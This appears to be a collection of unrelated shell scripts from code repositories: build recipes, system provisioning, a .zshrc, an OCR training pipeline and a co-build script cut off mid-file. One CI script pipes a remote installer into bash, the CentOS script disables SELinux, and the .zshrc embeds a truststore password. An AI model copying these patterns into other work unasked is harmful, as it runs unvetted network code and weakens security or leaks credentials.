#ident "@(#)portmgmt:port_quick/q-rm.sh 1.1.3.3"
# PURPOSE: Remove currently configured RS232 port
# ---------------------------------------------------------------------
STREAM="NULL"
REBOOT="NO"
# Snapshot the config files that may be modified below.
cp /etc/conf/sdevice.d/asy /usr/tmp/Osdevice.d
cp /etc/conf/node.d/asy /usr/tmp/Onode.d
cp /etc/inittab /usr/tmp/Oinittab
cp /etc/saf/ttymon3/_pmtab /usr/tmp/pmtab
# Each argument names a port; the tty identifier lives at characters 11-16.
for i in $*
do
TTY=`echo $i | cut -c11-16`
if [ $TTY = 01 -o $TTY = 01s -o $TTY = 01h ]
then
grep -v "$TTY" /etc/conf/node.d/asy > /usr/tmp/node$$
cp /usr/tmp/node$$ /etc/conf/node.d/asy
rm -f /usr/tmp/node$$
REBOOT=YES
fi
grep "01h" /etc/conf/node.d/asy
RETURNh=$?
grep "01s" /etc/conf/node.d/asy
RETURNs=$?
# When neither 01s nor 01h remain, drop the whole 01 node and sdevice entry.
if [ $RETURNs != 0 -a $RETURNh != 0 ]
then
grep -v "01" /etc/conf/node.d/asy > /usr/tmp/node$$
cp /usr/tmp/node$$ /etc/conf/node.d/asy
grep -v "asy Y 1 7 1 3 2f8 2ff 0 0" /etc/conf/sdevice.d/asy > /usr/tmp/sd$$
cp /usr/tmp/sd$$ /etc/conf/sdevice.d/asy
rm -f /usr/tmp/sd$$ /usr/tmp/node$$
REBOOT=YES
fi
if [ $TTY = 00 -o $TTY = 00s -o $TTY = 00h ]
then
grep -v "$TTY" /etc/conf/node.d/asy > /usr/tmp/node$$
cp /usr/tmp/node$$ /etc/conf/node.d/asy
rm -f /usr/tmp/node$$
REBOOT=YES
fi
# See if the device specifies is
# a streams or a clist based device.
# If it is clist then a getty is removed in inittab
# If it is not, then sacadm is used for ttymon.
# The isastream program will return a 1 for a stream device
# a 0 for a clist based device.
# Fixed: a stray "$" token inside this test ("01s $ -o") made test(1) fail
# with a syntax error, so 01* ports were never treated as stream devices.
if [ $TTY = 01 -o $TTY = 01s -o $TTY = 01h ]
then
STREAM=YES
else
/usr/sadm/sysadm/bin/isastream /dev/term/$TTY
RET=$?
if [ $RET = 1 ]
then
STREAM=YES
else
if [ $RET = 0 ]
then
STREAM=NO
else
echo "Cannot open port $i.\n " >>/usr/tmp/ap.$VPID
continue
fi
fi
fi
if [ "$STREAM" = "NO" ]
then
trap '' 1 2 3 9 15
DOTTTY=$TTY
rm -f /etc/conf/init.d/ua_${TTY} /etc/conf/rc.d/boot_${TTY}
if [ -c /dev/${DOTTTY} ]
then
chmod 666 /dev/${DOTTTY}
chown root /dev/${DOTTTY}
chgrp sys /dev/${DOTTTY}
fi
trap '' 1 2 3 9 15
# Regenerate inittab without the removed port's getty entry.
/etc/conf/bin/idmkinit -o /usr/tmp
cp /usr/tmp/inittab /usr/tmp/inittab$$
chown bin /usr/tmp/inittab$$
chgrp bin /usr/tmp/inittab$$
chmod 444 /usr/tmp/inittab$$
cp /usr/tmp/inittab$$ /etc/inittab
telinit q
# NOTE(review): "ap.$VPID:1" differs from the "ap.$VPID" log file used
# everywhere else -- possibly a typo; confirm before changing.
echo "$i was successfully removed.\n" >>/usr/tmp/ap.$VPID:1
else
pmadm -r -p ttymon3 -s $TTY >/dev/null 2>&1
echo "$i was successfully removed.\n" >>/usr/tmp/ap.$VPID
fi
done
if [ $REBOOT = YES ]
then
rm -f /usr/tmp/Osdevice.d /usr/tmp/Onode.d /usr/tmp/pmtab
rm -f /usr/tmp/inittab$$ /usr/tmp/inittab /usr/tmp/Oinittab
/etc/conf/bin/idmknod > /dev/null 2>&1
fi
echo 0
exit 0
| true
|
269adc136ba7b11805a61f2db245725996be7110
|
Shell
|
sskafandri/Linux-Config
|
/configure_centos.sh
|
UTF-8
| 2,325
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash
# One-shot CentOS provisioning: updates packages, disables SELinux, pins
# Google DNS, hardens SSH, enables auto-updates and TRIM, and sets timezone.
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
CWD="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
# Guard: only run on RHEL-family systems.
if [ ! -f /etc/redhat-release ]; then
echo "CentOS no detectado, abortando."
exit 0
fi
echo "Actualizando SO..."
yum update -y
yum groupinstall "Base" -y
yum install screen -y
# Disable SELinux persistently and immediately.
sed -i 's/^SELINUX=.*/SELINUX=disabled/' /etc/sysconfig/selinux
sed -i 's/^SELINUX=.*/SELINUX=disabled/' /etc/selinux/config
/usr/sbin/setenforce 0
iptables-save > /root/firewall.rules
echo "Configurando Red..."
# Detect the interface holding the default route.
RED=$(route -n | awk '$1 == "0.0.0.0" {print $8}')
ETHCFG="/etc/sysconfig/network-scripts/ifcfg-$RED"
# Replace any existing DNS directives with Google resolvers.
sed -i '/^PEERDNS=.*/d' $ETHCFG
sed -i '/^DNS1=.*/d' $ETHCFG
sed -i '/^DNS2=.*/d' $ETHCFG
echo "PEERDNS=no" >> $ETHCFG
echo "DNS1=8.8.8.8" >> $ETHCFG
echo "DNS2=8.8.4.4" >> $ETHCFG
echo "Reescribiendo /etc/resolv.conf..."
echo "nameserver 8.8.8.8" > /etc/resolv.conf # Google
echo "nameserver 8.8.4.4" >> /etc/resolv.conf # Google
echo "Configurando SSH..."
sed -i 's/^X11Forwarding.*/X11Forwarding no/' /etc/ssh/sshd_config
sed -i 's/#UseDNS.*/UseDNS no/' /etc/ssh/sshd_config
echo "Configurando FSCK..."
grubby --update-kernel=ALL --args=fsck.repair=yes
# NOTE(review): this sed lacks -i, so it prints to stdout and never edits
# /etc/default/grub -- likely a bug; confirm intent.
grep "fsck.repair" /etc/default/grub > /dev/null || sed 's/^GRUB_CMDLINE_LINUX="/&fsck.repair=yes /' /etc/default/grub
echo "Configurando Yum-Cron..."
yum -y install yum-cron
sed -i 's/^apply_updates.*/apply_updates = yes/' /etc/yum/yum-cron.conf
systemctl start yum-cron.service
echo "Configurando SSD (de poseer)..."
# Enable periodic TRIM when any non-rotational disk is present.
for DEVFULL in /dev/sg? /dev/sd?; do
DEV=$(echo "$DEVFULL" | cut -d'/' -f3)
if [ -f "/sys/block/$DEV/queue/rotational" ]; then
TYPE=$(grep "0" /sys/block/$DEV/queue/rotational > /dev/null && echo "SSD" || echo "HDD")
if [ "$TYPE" = "SSD" ]; then
systemctl enable fstrim.timer
fi
fi
done
echo "Sincronizando fecha con pool.ntp.org..."
ntpdate 0.pool.ntp.org 1.pool.ntp.org 2.pool.ntp.org 3.pool.ntp.org 0.south-america.pool.ntp.org
if [ -f /usr/share/zoneinfo/America/Buenos_Aires ]; then
echo "Seteando timezone a America/Buenos_Aires..."
mv /etc/localtime /etc/localtime.old
ln -s /usr/share/zoneinfo/America/Buenos_Aires /etc/localtime
fi
echo "Seteando fecha del BIOS..."
hwclock -r
echo "Instalando GIT..."
yum install git -y
echo "Finalizado!"
| true
|
3b481a0f7b63a1a6c773a4642076ff00067869fb
|
Shell
|
myanime/indeed_server
|
/macmans_cron.sh
|
UTF-8
| 351
| 2.578125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Poor man's cron: repeatedly launch the local indeed scraper in a new
# macOS Terminal window, once at startup and then every 4 hours.
# NOTE(review): COUNTRY is set but not exported or used here -- presumably
# consumed by local_indeed.sh; confirm whether it should be exported.
COUNTRY='au'
echo "Poor Mans Cron"
sleep 5
echo "Starting"
osascript -e 'tell application "Terminal" to do script "/Users/ryan/repos/indeed_server/local_indeed.sh"'
while true
do
# 14400 s = 4 hours. Fixed: the old message claimed "24hrs", which did not
# match the actual sleep interval.
echo "Starting in 4hrs"
sleep 14400
osascript -e 'tell application "Terminal" to do script "/Users/ryan/repos/indeed_server/local_indeed.sh"'
done
| true
|
e69974897b3b31e13ea72093e7647c1476ec8ba3
|
Shell
|
hivesolutions/scudum
|
/scripts/build/extras/help2man.sh
|
UTF-8
| 365
| 3.265625
| 3
|
[
"Apache-2.0"
] |
permissive
|
# Fetch, build and install GNU help2man into $PREFIX (set by common.sh).
VERSION=${VERSION-1.47.3}
DIR=$(dirname $(readlink -f ${BASH_SOURCE[0]}))
set -e +h
source $DIR/common.sh
wget --content-disposition "http://ftp.gnu.org/gnu/help2man/help2man-$VERSION.tar.xz"
rm -rf help2man-$VERSION && tar -Jxf "help2man-$VERSION.tar.xz"
# Remove the downloaded archive after extraction.
# Fixed: the original removed "help2man-$VERSION.tar.gz", a file that never
# existed (the download is .tar.xz), so the tarball was left behind.
rm -f "help2man-$VERSION.tar.xz"
cd help2man-$VERSION
./configure --prefix=$PREFIX
make && make install
| true
|
e9ec400eb8412b8afd50ac1fbd1564383422c95c
|
Shell
|
lightbulbone/uefi
|
/uefininja/strings.sh
|
UTF-8
| 146
| 2.796875
| 3
|
[] |
no_license
|
#!/bin/bash
# Dump printable strings from every file under the current directory whose
# name matches the (case-insensitive) pattern in $1.
# Usage: strings.sh '<name-pattern>'
# Fixed: iterating over $(find ...) word-split paths containing whitespace;
# stream NUL-delimited paths instead.
find . -iname "$1" -print0 | while IFS= read -r -d '' f; do
  strings -a -f "$f"       # C-style strings
  strings -a -f -e l "$f"  # 16 bit LE strings
done
| true
|
f5964c63e0284da748d2e3a0fec6624a55724fdc
|
Shell
|
srdg/unarchivingbengali
|
/src/e2ep.sh
|
UTF-8
| 1,404
| 2.75
| 3
|
[] |
no_license
|
# End-to-end pipeline: install tesseract plus Bengali language data, fetch
# the training data and tesstrain tooling, then train the "ben" model.
echo "*******************Install dependencies***************************"
sudo apt-get install tesseract-ocr bc libtesseract-dev
echo "********************Verify installation**************************"
which tesseract
echo "*******************Install language***************************"
sudo apt-get install tesseract-ocr-ben
echo "*********************Verify language*************************"
ls /usr/share/tesseract-ocr/4.00/tessdata | grep traineddata
echo "**********************Download training data************************"
mkdir -p ./data/ben-ground-truth
wget https://github.com/srdg/unarchived_ben_tess/releases/download/v0.0.2-alpha/data.zip -q --show-progress
unzip -q ./data.zip -d ./data/ben-ground-truth && rm -rf ./data.zip
echo "**********************Download training tools************************"
wget https://github.com/tesseract-ocr/tesstrain/archive/master.zip -q --show-progress && unzip -q ./master.zip # unzip training diretory
# Fixed: the original read `rm -rf ./master.zip && sample_data/`; the
# trailing "sample_data/" is not a command and always failed.
rm -rf ./master.zip
echo "***********************Move training data***********************"
mv ./data ./tesstrain-master/
echo "======================= READY TO TRAIN ========================="
cd ./tesstrain-master/
echo "======================= TRAINING MODEL ========================="
make training MODEL_NAME=ben RATIO_TRAIN=0.80
echo "======================= TRAINING DONE! ========================="
| true
|
bfa6bce8d50ddb4b9eb5bd152ebfa8ed2cb88142
|
Shell
|
simhaonline/oftee-sdn-aaa-app
|
/pp.sh
|
UTF-8
| 270
| 2.796875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# useful utility for processing hex strings and packet captures to byte
# array data that can be used in golang.
# Strip any leading "0xNNNN:" offsets and whitespace, split the remaining
# hex digits into byte pairs, then emit them as "0xAA, 0xBB, ..." wrapped
# to the terminal width.
bytes=$(echo $* | sed 's/0x[0-9]*://g; s/ //g' | fold -w2 | tr '\n' ' ')
echo $bytes | sed 's/^/0x/; s/ /, 0x/g' | fold -s
| true
|
9999286887208fb85a8e188a245b14ca436833c2
|
Shell
|
aidan-n/moneygo
|
/scripts/gen_cusip_csv.sh
|
UTF-8
| 1,836
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
QUARTER=2017q1
function get_ticker() {
local cusip=$1
local tmpfile=$tmpdir/curl_tmpfile
curl -s -d "sopt=cusip&tickersymbol=${cusip}" http://quantumonline.com/search.cfm > $tmpfile
local quantum_name=$(sed -rn 's@<font size="\+1"><center><b>(.+)</b><br></center></font>\s*$@\1@p' $tmpfile | head -n1)
local quantum_ticker=$(sed -rn 's@^.*Ticker Symbol: ([A-Z\.0-9\-]+) CUSIP.*$@\1@p' $tmpfile | head -n1)
if [[ -z $quantum_ticker ]] || [[ -z $quantum_name ]]; then
curl -s -d "reqforlookup=REQUESTFORLOOKUP&productid=mmnet&isLoggedIn=mmnet&rows=50&for=stock&by=cusip&criteria=${cusip}&submit=Search" http://quotes.fidelity.com/mmnet/SymLookup.phtml > $tmpfile
fidelity_name=$(sed -rn 's@<tr><td height="20" nowrap><font class="smallfont">(.+)</font></td>\s*@\1@p' $tmpfile | sed -r 's/\&/\&/')
fidelity_ticker=$(sed -rn 's@\s+<td align="center" width="20%"><font><a href="/webxpress/get_quote\?QUOTE_TYPE=\&SID_VALUE_ID=(.+)">(.+)</a></td>\s*@\1@p' $tmpfile | head -n1)
if [[ -z $fidelity_ticker ]] || [[ -z $fidelity_name ]]; then
echo $cusip >> $tmpdir/${QUARTER}_bad_cusips.csv
else
echo "$cusip,$fidelity_ticker,$fidelity_name"
fi
else
echo "$cusip,$quantum_ticker,$quantum_name"
fi
}
tmpdir=$(mktemp -d -p $PWD)
# Get the list of CUSIPs from the SEC and generate a nicer format of it
wget -q http://www.sec.gov/divisions/investment/13f/13flist${QUARTER}.pdf -O $tmpdir/13flist${QUARTER}.pdf
pdftotext -layout $tmpdir/13flist${QUARTER}.pdf - > $tmpdir/13flist${QUARTER}.txt
sed -rn 's/^([A-Z0-9]{6}) ([A-Z0-9]{2}) ([A-Z0-9]) .*$/\1\2\3/p' $tmpdir/13flist${QUARTER}.txt > $tmpdir/${QUARTER}_cusips
# Find tickers and names for all the CUSIPs we can and print them out
for cusip in $(cat $tmpdir/${QUARTER}_cusips); do
get_ticker $cusip
done
rm -rf $tmpdir
| true
|
aa1efb6f3e51f0124c2656f5a331a9c82ac5983a
|
Shell
|
bjcerveny/dotfiles
|
/.zshrc
|
UTF-8
| 5,288
| 2.703125
| 3
|
[] |
no_license
|
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
# Initialization code that may require console input (password prompts, [y/n]
# confirmations, etc.) must go above this block; everything else may go below.
if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
fi
# Path to your oh-my-zsh configuration.
source $HOME/.zshrc.site.pre
SHELL=/bin/zsh
ZSH=$HOME/.oh-my-zsh
DOTFILES=$HOME/git/dotfiles
TIMEFMT="'$fg[green]%J$reset_color' real: $fg[yellow]%*Es$reset_color, user: $fg[yellow]%U$reset_color, sys: $fg[yellow]%S$reset_color, cpu: $fg[yellow]%P$reset_color"
# Set name of the theme to load.
# Look in ~/.oh-my-zsh/themes/
# Optionally, if you set this to "random", it'll load a random theme each
# time that oh-my-zsh is loaded.
ZSH_THEME=powerlevel10k/powerlevel10k
# Uncomment the following line to use case-sensitive completion.
# CASE_SENSITIVE="true"
# Uncomment the following line to disable bi-weekly auto-update checks.
# DISABLE_AUTO_UPDATE="true"
# Uncomment the following line to change how often to auto-update (in days).
# export UPDATE_ZSH_DAYS=13
# Uncomment the following line to disable colors in ls.
# DISABLE_LS_COLORS="true"
# Uncomment the following line to disable auto-setting terminal title.
# DISABLE_AUTO_TITLE="true"
# Uncomment the following line to enable command auto-correction.
# ENABLE_CORRECTION="true"
# Uncomment the following line to display red dots whilst waiting for completion.
# COMPLETION_WAITING_DOTS="true"
# Uncomment the following line if you want to disable marking untracked files
# under VCS as dirty. This makes repository status check for large repositories
# much, much faster.
DISABLE_UNTRACKED_FILES_DIRTY="true"
# Uncomment the following line if you want to change the command execution time
# stamp shown in the history command output.
# The optional three formats: "mm/dd/yyyy"|"dd.mm.yyyy"|"yyyy-mm-dd"
# HIST_STAMPS="mm/dd/yyyy"
# Would you like to use another custom folder than $ZSH/custom?
ZSH_CUSTOM=$DOTFILES/oh-my-zsh-custom
# Which plugins would you like to load? (plugins can be found in ~/.oh-my-zsh/plugins/*)
# Custom plugins may be added to ~/.oh-my-zsh/custom/plugins/
# Example format: plugins=(rails git textmate ruby lighthouse)
# Add wisely, as too many plugins slow down shell startup.
plugins=(aws git svn osx docker gradle brew repo history-substring-search)
source $ZSH/oh-my-zsh.sh
# User configuration
source $DOTFILES/brians-dotfiles.sh
# Customize to your needs...
export PATH=~/bin:/opt/swdev/bin:$HOME/bin:/usr/local/bin:$PATH:./
# export MANPATH="/usr/local/man:$MANPATH"
# You may need to manually set your language environment
# export LANG=en_US.UTF-8
# Preferred editor for local and remote sessions
# if [[ -n $SSH_CONNECTION ]]; then
# export EDITOR='vim'
# else
# export EDITOR='mvim'
# fi
# Set personal aliases, overriding those provided by oh-my-zsh libs,
# plugins, and themes. Aliases can be placed here, though oh-my-zsh
# users are encouraged to define aliases within the ZSH_CUSTOM folder.
# For a full list of active aliases, run `alias`.
#
source ~/.aliases.zsh
# Turn off annoying spell correction
setopt nocorrectall
if [[ `uname -s` == "Darwin" ]]; then
export GROOVY_HOME=/usr/local/opt/groovy/libexec
export JAVA_HOME=`/usr/libexec/java_home`
# for Bee
#export JAVA_OPTS="$JAVA_OPTS -Djavax.net.ssl.trustStore=/Library/Java/Home/lib/security/cacerts -Djavax.net.ssl.trustStorePassword=java-0kEys"
export JAVA_OPTS="$JAVA_OPTS -Djavax.net.ssl.trustStore=$JAVA_HOME/lib/security/cacerts -Djavax.net.ssl.trustStorePassword=java-0kEys"
export GRADLE_HOME=/usr/local/opt/gradle/libexec
fi
LD_LIBRARY_PATH=$HOME/lib:$LD_LIBRARY_PATH
cdpath=(~ ~/Work /local/$USER)
# Set site-specific items.
source ~/.zshrc.site
compinit -i
export LESS=-r
export PAGER=less
# added by Anaconda3 2019.03 installer
# >>> conda init >>>
# !! Contents within this block are managed by 'conda init' !!
# Fixed: the installer emitted '$HOME/anaconda3/bin/conda' in single quotes,
# so the path was taken literally (never exists) and the hook could never
# run; double quotes let $HOME expand.
__conda_setup="$(CONDA_REPORT_ERRORS=false "$HOME/anaconda3/bin/conda" shell.bash hook 2> /dev/null)"
if [ $? -eq 0 ]; then
\eval "$__conda_setup"
else
# Fall back to the profile script, then to a plain PATH entry.
if [ -f "/Users/bcerveny/anaconda3/etc/profile.d/conda.sh" ]; then
# . "/Users/bcerveny/anaconda3/etc/profile.d/conda.sh" # commented out by conda initialize
CONDA_CHANGEPS1=false conda activate base
else
\export PATH="/Users/bcerveny/anaconda3/bin:$PATH"
fi
fi
unset __conda_setup
# <<< conda init <<<
# To customize prompt, run `p10k configure` or edit ~/.p10k.zsh.
[[ -f ~/.p10k.zsh ]] && source ~/.p10k.zsh
# >>> conda initialize >>>
# !! Contents within this block are managed by 'conda init' !!
__conda_setup="$('/usr/local/Caskroom/miniconda/base/bin/conda' 'shell.zsh' 'hook' 2> /dev/null)"
if [ $? -eq 0 ]; then
eval "$__conda_setup"
else
if [ -f "/usr/local/Caskroom/miniconda/base/etc/profile.d/conda.sh" ]; then
. "/usr/local/Caskroom/miniconda/base/etc/profile.d/conda.sh"
# Fixed: the original had a dangling `else` with an empty body here, which
# is a shell syntax error and aborted sourcing of this file.
fi
fi
unset __conda_setup
# <<< conda initialize <<<
# Prefer Homebrew ruby and python 3.8 over the system versions.
export PATH="/usr/local/opt/ruby/bin:/usr/local/opt/python@3.8/bin:$PATH"
# NOTE(review): this overrides the colourised TIMEFMT set earlier in this
# file -- confirm which one is intended.
TIMEFMT="%J %U user %S system %P cpu %*E total"
eval "$(direnv hook zsh)"
| true
|
cd14b768bd55e7b0024e758b4ac2e6d19790d2ab
|
Shell
|
yassun/crypto-qrcode-generator
|
/script/ci-install-web.sh
|
UTF-8
| 273
| 2.703125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# CI helper: install Yarn and the web app's JS dependencies.
# Requires WEB_SRC_DIR and TRAVIS_BUILD_DIR to be set (fails under set -u).
set -eu
set -o pipefail
# Install Yarn (https://yarnpkg.com/en/docs/install-ci#travis-tab)
curl -o- -L https://yarnpkg.com/install.sh | bash
export PATH="$HOME/.yarn/bin:$PATH"
# Install package json
cd $WEB_SRC_DIR
yarn install
cd $TRAVIS_BUILD_DIR
| true
|
73ac39c4420afc48bac19623c2fe313062fc68a1
|
Shell
|
atlury/aryalinux
|
/applications/gst-plugins-bad.sh
|
UTF-8
| 1,336
| 2.921875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# ALPS build recipe: download, patch, build and install gst-plugins-bad
# 0.10.23. Depends on /etc/alps/alps.conf for SOURCE_DIR / INSTALLED_LIST
# and /var/lib/alps/functions for cleanup / register_installed.
set -e
. /etc/alps/alps.conf
NAME="gst-plugins-bad"
VERSION="0.10.23"
. /var/lib/alps/functions
#REQ:gst-plugins-base
#REC:faac
#REC:libpng
#REC:libvpx
#REC:openssl10
#REC:xvid
#OPT:curl
#OPT:faad2
#OPT:jasper
#OPT:libass
#OPT:libmusicbrainz
#OPT:librsvg
#OPT:libsndfile
#OPT:libvdpau
#OPT:neon
#OPT:sdl
#OPT:soundtouch
cd $SOURCE_DIR
URL=http://gstreamer.freedesktop.org/src/gst-plugins-bad/gst-plugins-bad-0.10.23.tar.xz
# -nc: skip the download when the tarball is already present.
wget -nc http://gstreamer.freedesktop.org/src/gst-plugins-bad/gst-plugins-bad-0.10.23.tar.xz
TARBALL=`echo $URL | rev | cut -d/ -f1 | rev`
DIRECTORY=`tar tf $TARBALL | cut -d/ -f1 | uniq`
tar xf $TARBALL
cd $DIRECTORY
# Source fix for a malformed comment in gstvp8utils.h (BLFS patch).
sed -e '/Some compatibility/ s:*/::' \
-e '/const char/ i*/' \
-i ext/vp8/gstvp8utils.h
./configure --prefix=/usr \
--with-gtk=3.0 \
--disable-examples \
--disable-static \
--with-package-name="GStreamer Bad Plugins 0.10.23 BLFS" \
--with-package-origin="http://www.linuxfromscratch.org/blfs/view/systemd/" &&
make "-j`nproc`"
# Run `make install` as root via a generated helper script.
sudo tee rootscript.sh << "ENDOFROOTSCRIPT"
make install
ENDOFROOTSCRIPT
sudo chmod 755 rootscript.sh
sudo ./rootscript.sh
sudo rm rootscript.sh
cd $SOURCE_DIR
cleanup "$NAME" "$DIRECTORY"
register_installed "$NAME" "$VERSION" "$INSTALLED_LIST"
| true
|
7b576d88aff8355bcaa2b8931e9e80eccdc3b7f3
|
Shell
|
liuleiliujing/FreemodusTCP-On-Wifi-CHIP
|
/SDK_V4.8.0/tools/scripts/build/co_build_script/build.sh
|
UTF-8
| 11,972
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
# This script will start the compilation of cm4/dsp according to the configuration file (mapping_proj.cfg).
# Build cm4 would bring bl option by default.
###############################################################################
# Variables
OUT="$PWD/out"
working_dir="$PWD"
feature_mk=""
# Defines the map__<board>__<project> associative arrays consumed below.
source mcu/tools/scripts/build/co_build_script/mapping_proj.cfg
###############################################################################
# Functions
# Print invocation help for the co-build wrapper to stdout.
show_usage () {
cat <<EOF
===============================================================
Build Project
===============================================================
Usage: $0 <board> <project> [clean]

Example:
 $0 ab1558_evk no_rtos_initialize_system
 $0 clean (clean folder: out)
 $0 ab1558_evk clean (clean folder: out/ab1558_evk)
 $0 ab1558_evk no_rtos_initialize_system clean (clean folder: out/ab1558_evk/no_rtos_initialize_system)

===============================================================
List Available Example Projects
===============================================================
Usage: $0 list

EOF
}
# List every board/project combination declared in mapping_proj.cfg by
# introspecting the variables named map__<board>__<project>.
show_available_proj () {
echo "==============================================================="
echo "Available Build Projects:"
echo "==============================================================="
for var in ${!map_@}
do
# Variable names use "__" as a field separator: map__<board>__<project>.
board=$(echo $var | sed 's/__/:/g' | cut -d':' -f2)
project=$(echo $var | sed 's/__/:/g' | cut -d':' -f3)
echo "$board"
echo " $project"
# Pull keys/values out of the associative array via eval indirection.
eval proj_map_key=( \${!$var[@]} )
eval proj_map_value=( \${$var[@]} )
# Print each core (cm4/dsp0/dsp1) with its mapped sub-project.
for key in ${proj_map_key[@]}
do
eval echo \"\ \ \ \ \ \ $key: \${$var[\"$key\"]}\"
done
done
}
# Remove the given output directory tree and log the action on stdout.
clean_out () {
    local target=$1
    rm -rf $target
    echo "rm -rf $target"
}
# copy cm4 files
# Copy CM4 build artifacts for board $1 / mcu project $2 into
# out/$1/$3/{debug,download}. Each copy is preceded by an echo of the
# command and guarded with `test -e` so missing files are skipped silently.
copy_cm4_files () {
debug_dir=out/$1/$3/debug
download_dir=out/$1/$3/download
if [ ! -e "$debug_dir" ]; then
mkdir -p "$debug_dir"
fi
if [ ! -e "$download_dir" ]; then
mkdir -p "$download_dir"
fi
# copy debug files if exist
echo "cp -f mcu/out/$1/$2/$2.elf $debug_dir"
echo "cp -f mcu/out/$1/$2/$2.dis $debug_dir"
echo "cp -f mcu/out/$1/$2/$2.map $debug_dir"
echo "cp -f mcu/out/$1/$2/cm4_log_str.bin $debug_dir"
test -e mcu/out/$1/$2/$2.elf && cp -f mcu/out/$1/$2/$2.elf $debug_dir
test -e mcu/out/$1/$2/$2.dis && cp -f mcu/out/$1/$2/$2.dis $debug_dir
test -e mcu/out/$1/$2/$2.map && cp -f mcu/out/$1/$2/$2.map $debug_dir
test -e mcu/out/$1/$2/cm4_log_str.bin && cp -f mcu/out/$1/$2/cm4_log_str.bin $debug_dir
# copy download files if exist
echo "cp -f mcu/out/$1/$2/flash_download.cfg $download_dir"
echo "cp -f mcu/out/$1/$2/*_bootloader.bin $download_dir"
echo "cp -f mcu/out/$1/$2/$2.bin $download_dir"
echo "cp -f mcu/out/$1/$2/partition_table.bin $download_dir"
echo "cp -f mcu/out/$1/$2/ab155x_patch_hdr.bin $download_dir"
test -e mcu/out/$1/$2/flash_download.cfg && cp -f mcu/out/$1/$2/flash_download.cfg $download_dir
test -e mcu/out/$1/$2/*_bootloader.bin && cp -f mcu/out/$1/$2/*_bootloader.bin $download_dir
test -e mcu/out/$1/$2/$2.bin && cp -f mcu/out/$1/$2/$2.bin $download_dir
test -e mcu/out/$1/$2/partition_table.bin && cp -f mcu/out/$1/$2/partition_table.bin $download_dir
test -e mcu/out/$1/$2/ab155x_patch_hdr.bin && cp -f mcu/out/$1/$2/ab155x_patch_hdr.bin $download_dir
}
# copy dsp files
# Copy DSP build artifacts for board $1 / dsp project $2 into
# out/$1/$3/{debug,download}; mirrors copy_cm4_files, guarded the same way.
copy_dsp_files () {
debug_dir=out/$1/$3/debug
download_dir=out/$1/$3/download
if [ ! -e "$debug_dir" ]; then
mkdir -p $debug_dir
fi
if [ ! -e "$download_dir" ]; then
mkdir -p "$download_dir"
fi
# copy debug files if exist
echo "cp -f dsp/out/$1/$2/$2.out $debug_dir"
echo "cp -f dsp/out/$1/$2/$2.asm $debug_dir"
echo "cp -f dsp/out/$1/$2/$2.map $debug_dir"
echo "cp -f dsp/out/$1/$2/dsp*_log_str.bin $debug_dir"
test -e dsp/out/$1/$2/$2.out && cp -f dsp/out/$1/$2/$2.out $debug_dir
test -e dsp/out/$1/$2/$2.asm && cp -f dsp/out/$1/$2/$2.asm $debug_dir
test -e dsp/out/$1/$2/$2.map && cp -f dsp/out/$1/$2/$2.map $debug_dir
test -e dsp/out/$1/$2/dsp*_log_str.bin && cp -f dsp/out/$1/$2/dsp*_log_str.bin $debug_dir
# copy download files if exist
echo "cp -f dsp/out/$1/$2/$2.bin $download_dir"
test -e dsp/out/$1/$2/$2.bin && cp -f dsp/out/$1/$2/$2.bin $download_dir
}
###############################################################################
# Parsing arguments
if [ "$#" -eq "0" ]; then
show_usage
exit 1
fi
declare -a argv=($0)
for i in $@
do
case $i in
list)
show_available_proj
exit 0
;;
-f=*|--feature=*)
feature_mk="${i#*=}"
;;
-*)
echo "Error: unknown parameter \"$i\""
show_usage
exit 1
;;
*)
argv+=($i)
;;
esac
done
# check configurations
board=${argv[1]}
project=${argv[2]}
output_dir=$OUT/$board/$project
mapping_var="map__${board}__${project}"
eval dsp1_proj=\${$mapping_var["dsp1"]}
eval dsp0_proj=\${$mapping_var["dsp0"]}
eval cm4_proj=\${$mapping_var["cm4"]}
# To do actions according to arguments
if [ "${argv[3]}" == "clean" ]; then
if [ "${#argv[@]}" != "4" ]; then
show_usage
exit 1
fi
if [ ! -z "$dsp1_proj" ]; then
clean_out $working_dir/dsp/out/$board/$dsp1_proj
fi
if [ ! -z "$dsp0_proj" ]; then
clean_out $working_dir/dsp/out/$board/$dsp0_proj
fi
if [ ! -z "$cm4_proj" ]; then
clean_out $working_dir/mcu/out/$board/$cm4_proj
fi
clean_out $OUT/$board/$project
elif [ "${argv[2]}" == "clean" ]; then
if [ "${#argv[@]}" != "3" ]; then
show_usage
exit 1
fi
clean_out $working_dir/dsp/out/$board
clean_out $working_dir/mcu/out/$board
clean_out $OUT/$board
elif [ "${argv[1]}" == "clean" ]; then
if [ "${#argv[@]}" != "2" ]; then
show_usage
exit 1
fi
clean_out $working_dir/mcu/out
clean_out $working_dir/dsp/out
clean_out $OUT
else
if [ "${#argv[@]}" != "3" ]; then
show_usage
exit 1
fi
eval mapping_var_key=\${!$mapping_var[@]}
if [ -z "$mapping_var_key" ]; then
show_usage
echo "Error: cannot find board=$board project=$project configurations in mapping_proj.cfg."
exit 1
fi
rm -rf $output_dir/log
mkdir -p $output_dir/log
rm -rf $output_dir/debug
mkdir -p $output_dir/debug
rm -rf $output_dir/download
mkdir -p $output_dir/download
echo "$0 $@" > $output_dir/log/build_time.log
echo "Start CO-Build: "`date` >> $output_dir/log/build_time.log
# dsp1 build start
if [ ! -z "$dsp1_proj" ]; then
echo "cd $working_dir/dsp"
cd $working_dir/dsp
echo "=============================================================="
echo "Start DSP1 Build"
echo "=============================================================="
#echo "Start DSP1 Build: "`date` >> $output_dir/log/build_time.log
./build.sh $board $dsp1_proj
DSP1_BUILD_RESULT=$?
#echo "End DSP1 Build: "`date` >> $output_dir/log/build_time.log
echo "=============================================================="
echo "End DSP1 Build"
